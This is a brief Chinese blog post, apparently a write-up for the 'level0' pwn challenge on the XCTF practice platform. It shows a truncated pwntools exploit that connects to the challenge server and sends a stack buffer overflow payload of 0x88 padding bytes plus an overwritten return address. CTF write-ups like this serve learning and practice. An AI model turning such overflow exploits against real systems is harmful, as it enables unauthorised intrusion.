Pwn_WP(动态更新)

题解/Write Up 攻防世界 level0 #exp: from pwn import * r = remote("111.198.29.45", 34012) payload = 'A' * 0x88 + p64(0x00400596).decode("iso-8859-1") r.recvu
posted @ 2022-04-29 17:46  L1ngYi  阅读(93)  评论(0编辑  收藏  举报